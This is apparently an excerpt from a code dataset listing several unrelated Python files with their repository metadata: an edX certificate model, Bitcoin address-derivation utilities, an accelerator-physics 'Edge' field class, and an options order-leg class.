for the generated certificate.
Arguments:
status (str): Either `STATUS_SUCCESS` or `STATUS_ERROR`
Keyword Arguments:
error_reason (unicode): A description of the error that occurred.
download_url (unicode): The URL for the generated certificate.
Raises:
ValueError: The status is not a valid value.
"""
if status not in [self.STATUS_SUCCESS, self.STATUS_ERROR]:
msg = u"Invalid status: must be either '{success}' or '{error}'.".format(
success=self.STATUS_SUCCESS,
error=self.STATUS_ERROR
)
raise ValueError(msg)
self.status = status
if status == self.STATUS_ERROR and error_reason:
self.error_reason = error_reason
if status == self.STATUS_SUCCESS and download_url:
self.download_url = download_url
self.save()
@property
def status_dict(self):
"""Summarize the status of the example certificate.
Returns:
dict
"""
result = {
'description': self.description,
'status': self.status,
}
if self.error_reason:
result['error_reason'] = self.error_reason
if self.download_url:
result['download_url'] = self.download_url
return result
@property
def course_key(self):
"""The course key associated with the example certificate. """
return self.example_cert_set.course_key
class CertificateGenerationCourseSetting(TimeStampedModel):
"""Enable or disable certificate generation for a particular course.
This controls whether students are allowed to "self-generate"
certificates for a course. It does NOT prevent us from
batch-generating certificates for a course using management
commands.
In general, we should only enable self-generated certificates
for a course once we successfully generate example certificates
for the course. This is enforced in the UI layer, but
not in the data layer.
"""
course_key = CourseKeyField(max_length=255, db_index=True)
enabled = models.BooleanField(default=False)
class Meta: # pylint: disable=missing-docstring, old-style-class
get_latest_by = 'created'
@classmethod
def is_enabled_for_course(cls, course_key):
"""Check whether self-generated certificates are enabled for a course.
Arguments:
course_key (CourseKey): The identifier for the course.
Returns:
boolean
"""
try:
latest = cls.objects.filter(course_key=course_key).latest()
except cls.DoesNotExist:
return False
else:
return latest.enabled
@classmethod
def set_enabled_for_course(cls, course_key, is_enabled):
"""Enable or disable self-generated certificates for a course.
Arguments:
course_key (CourseKey): The identifier for the course.
is_enabled (boolean): Whether to enable or disable self-generated certificates.
"""
CertificateGenerationCourseSetting.objects.create(
course_key=course_key,
enabled=is_enabled
)
class CertificateGenerationConfiguration(ConfigurationModel):
"""Configure certificate generation.
Enable or disable the self-generated certificates feature.
When this flag is disabled, the "generate certificate" button
will be hidden on the progress page.
When the feature is enabled, the "generate certificate" button
will appear for courses that have enabled self-generated
certificates.
"""
pass
|
jazkarta/edx-platform-for-isc
|
lms/djangoapps/certificates/models.py
|
Python
|
agpl-3.0
| 17,158 | 0.000816 |
#!/usr/bin/env python
import binascii
import hashlib
from reversecoin.bitcoin.key import CKey as Key
from reversecoin.bitcoin.base58 import encode, decode
def myhash(s):
return hashlib.sha256(hashlib.sha256(s).digest()).digest()
def myhash160(s):
h = hashlib.new('ripemd160')
h.update(hashlib.sha256(s).digest())
return h.digest()
def getnewaddress():
# Generate public and private keys
key = Key()
key.generate()
key.set_compressed(True)
private_key = key.get_privkey()
public_key = key.get_pubkey()
private_key_hex = private_key.encode('hex')
public_key_hex = public_key.encode('hex')
public_key_bytearray = bytearray.fromhex(public_key_hex)
# Perform SHA-256 and RIPEMD-160 hashing on public key
hash160_address = myhash160(public_key_bytearray)
# add version byte: 0x00 for Main Network
extended_address = '\x00' + hash160_address
# generate double SHA-256 hash of extended address
hash_address = myhash(extended_address)
# Take the first 4 bytes of the second SHA-256 hash. This is the address checksum
checksum = hash_address[:4]
# Add the 4 checksum bytes from point 7 at the end of extended RIPEMD-160 hash from point 4. This is the 25-byte binary Bitcoin Address.
binary_address = extended_address + checksum
# Convert the result from a byte string into a base58 string using Base58Check encoding.
address = encode(binary_address)
return public_key, private_key, address
def public_key_to_address(public_key):
public_key_hex = public_key.encode('hex')
public_key_bytearray = bytearray.fromhex(public_key_hex)
# Perform SHA-256 and RIPEMD-160 hashing on public key
hash160_address = myhash160(public_key_bytearray)
# add version byte: 0x00 for Main Network
extended_address = '\x00' + hash160_address
# generate double SHA-256 hash of extended address
hash_address = myhash(extended_address)
# Take the first 4 bytes of the second SHA-256 hash. This is the address checksum
checksum = hash_address[:4]
# Add the 4 checksum bytes from point 7 at the end of extended RIPEMD-160 hash from point 4. This is the 25-byte binary Bitcoin Address.
binary_address = extended_address + checksum
address = encode(binary_address)
return address
def public_key_hex_to_address(public_key_hex):
public_key_bytearray = bytearray.fromhex(public_key_hex)
# Perform SHA-256 and RIPEMD-160 hashing on public key
hash160_address = myhash160(public_key_bytearray)
# add version byte: 0x00 for Main Network
extended_address = '\x00' + hash160_address
# generate double SHA-256 hash of extended address
hash_address = myhash(extended_address)
# Take the first 4 bytes of the second SHA-256 hash. This is the address checksum
checksum = hash_address[:4]
# Add the 4 checksum bytes from point 7 at the end of extended RIPEMD-160 hash from point 4. This is the 25-byte binary Bitcoin Address.
binary_address = extended_address + checksum
address = encode(binary_address)
return address
# fix this
def address_to_public_key_hash(address):
binary_address = decode(address)
# remove the 4 checksum bytes
extended_address = binary_address[:-4]
# remove version byte: 0x00 for Main Network
hash160_address = extended_address[1:]
return hash160_address
def public_key_hex_to_pay_to_script_hash(public_key_hex):
script = "41" + public_key_hex + "AC"
return binascii.unhexlify(script)
def address_to_pay_to_pubkey_hash(address):
print "Not implemented >>>>>>>>>>>>>>>>>>>"
exit(0)
def output_script_to_public_key_hash(script):
script_key_hash = binascii.hexlify(myhash160(bytearray.fromhex(binascii.hexlify(script[1:-1]))))
return script_key_hash
def address_to_output_script(address):
pass
if __name__ == "__main__":
address1 = "16UwLL9Risc3QfPqBUvKofHmBQ7wMtjvM"
address2 = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"
public_key_hex1 = "0450863AD64A87AE8A2FE83C1AF1A8403CB53F53E486D8511DAD8A04887E5B23522CD470243453A299FA9E77237716103ABC11A1DF38855ED6F2EE187E9C582BA6"
public_key_hex2 = "04678afdb0fe5548271967f1a67130b7105cd6a828e03909a67962e0ea1f61deb649f6bc3f4cef38c4f35504e51ec112de5c384df7ba0b8d578a4c702b6bf11d5f"
print "address: ", address1
print "public key_hex: ", public_key_hex1
#print "public_keys_hex: ", public_key_hex1, public_key_hex2
print "public key to address: ", public_key_hex_to_address(public_key_hex1)
print "address to public key hash: ", binascii.hexlify(address_to_public_key_hash(address1))
# print "public key hash: ", binascii.hexlify(myhash160(bytearray.fromhex(public_key_hex1)))
|
obulpathi/reversecoin
|
reversecoin/bitcoin/utils.py
|
Python
|
gpl-2.0
| 4,697 | 0.004897 |
from pseudoregion import *
class Edge(PseudoRegion):
"""EDGE Fringe field and other kicks for hard-edged field models
1) edge type (A4) {SOL, DIP, HDIP, DIP3, QUAD, SQUA, SEX, BSOL, FACE}
2.1) model # (I) {1}
2.2-5) p1, p2, p3,p4 (R) model-dependent parameters
Edge type = SOL
p1: BS [T]
If the main solenoid field is B, use p1=-B for the entrance edge and p1=+B for the exit edge.
Edge type = DIP
p1: BY [T]
Edge type = HDIP
p1: BX [T]
Edge type = DIP3
p1: rotation angle [deg]
p2: BY0 [T]
p3: flag 1:in 2:out
Edge type = QUAD
p1: gradient [T/m]
Edge type = SQUA
p1: gradient [T/m]
Edge type = SEX
p1: b2 [T/m2] (cf. C. Wang & L. Teng, MC 207)
Edge type = BSOL
p1: BS [T]
p2: BY [T]
p3: 0 for entrance face, 1 for exit face
Edge type = FACE
This gives vertical focusing from rotated pole faces.
p1: pole face angle [deg]
p2: radius of curvature of reference particle [m]
p3: if not 0 => correct kick by factor 1/(1+delta)
p4: if not 0 ==> apply horizontal focus with strength = (-vertical strength)
If a FACE command is used before and after a sector dipole (DIP), you can approximate a rectangular dipole field.
The DIP, HDIP, QUAD, SQUA, SEX and BSOL edge types use Scott Berg's HRDEND routine to find the change in transverse
position and transverse momentum due to the fringe field.
"""
def __init__(
self,
edge_type,
model,
model_parameters_list,
name=None,
metadata=None):
PseudoRegion.__init__(self, name, metadata)
self.edge_type = edge_type
self.model = model
self.model_parameters = model_parameters
class Edge(Field):
"""
EDGE
1) edge type (A4) {SOL, DIP, HDIP,DIP3,QUAD,SQUA,SEX, BSOL,FACE}
2.1) model # (I) {1}
2.2-5) p1, p2, p3,p4 (R) model-dependent parameters
Edge type = SOL
p1: BS [T]
If the main solenoid field is B, use p1=-B for the entrance edge and p1=+B for the exit edge.
Edge type = DIP
p1: BY [T]
Edge type = HDIP
p1: BX [T]
Edge type = DIP3
p1: rotation angle [deg]
p2: BY0 [T]
p3: flag 1:in 2:out
Edge type = QUAD
p1: gradient [T/m]
Edge type = SQUA
p1: gradient [T/m]
Edge type = SEX
p1: b2 [T/m2] (cf. C. Wang & L. Teng, MC 207)
Edge type = BSOL
p1: BS [T]
p2: BY [T]
p3: 0 for entrance face, 1 for exit face
Edge type = FACE
This gives vertical focusing from rotated pole faces.
p1: pole face angle [deg]
p2: radius of curvature of reference particle [m]
p3: if not 0 => correct kick by the factor 1 / (1+δ)
p4: if not 0 => apply horizontal focus with strength = (-vertical strength)
If a FACE command is used before and after a sector dipole ( DIP ), you can approximate a rectangular dipole field.
The DIP, HDIP, QUAD, SQUA, SEX and BSOL edge types use Scott Berg’s HRDEND routine to find the change in
transverse position and transverse momentum due to the fringe field.
"""
begtag = 'EDGE'
endtag = ''
models = {
'model_descriptor': {
'desc': 'Name of model parameter descriptor',
'name': 'model',
'num_parms': 6,
'for001_format': {
'line_splits': [
1,
5]}},
'sol': {
'desc': 'Solenoid',
'doc': '',
'icool_model_name': 'SOL',
'parms': {
'model': {
'pos': 1,
'type': 'String',
'doc': ''},
'bs': {
'pos': 3,
'type': 'Real',
'doc': 'p1: BS [T] '
'If the main solenoid field is B, use p1=-B for the entrance edge and p1=+B for the '
'exit edge. (You can use this to get a tapered field profile)'}}},
}
def __init__(self, **kwargs):
Field.__init__(self, 'EDGE', kwargs)
def __call__(self, **kwargs):
Field.__call__(self, kwargs)
def __setattr__(self, name, value):
if name == 'ftag':
if value == 'EDGE':
object.__setattr__(self, name, value)
else:
# Should raise exception here
print '\n Illegal attempt to set incorrect ftag.\n'
else:
Field.__setattr__(self, name, value)
def __str__(self):
return Field.__str__(self)
def gen_fparm(self):
Field.gen_fparm(self)
|
jon2718/ipycool_2.0
|
edge.py
|
Python
|
mit
| 4,743 | 0.002321 |
from kaleidoscope.globals import SecType
class OrderLeg(object):
def __init__(self, quantity, contract):
"""
This class is an abstraction of an order leg of an option strategy. It holds the information
for a single order leg as part of an entire option strategy.
"""
self.quantity = quantity
self.contract = contract
def reverse(self):
""" reverse the the position by negating the quantity """
self.quantity *= -1
class OptionLeg(OrderLeg):
""" Holds information of an option leg """
def __init__(self, option, quantity):
self.sec_type = SecType.OPT
super().__init__(quantity, option)
class StockLeg(OrderLeg):
""" Holds information of an stock leg """
def __init__(self, symbol, quantity):
self.sec_type = SecType.STK
super().__init__(quantity, symbol)
|
michaelchu/kaleidoscope
|
kaleidoscope/options/order_leg.py
|
Python
|
mit
| 884 | 0.001131 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.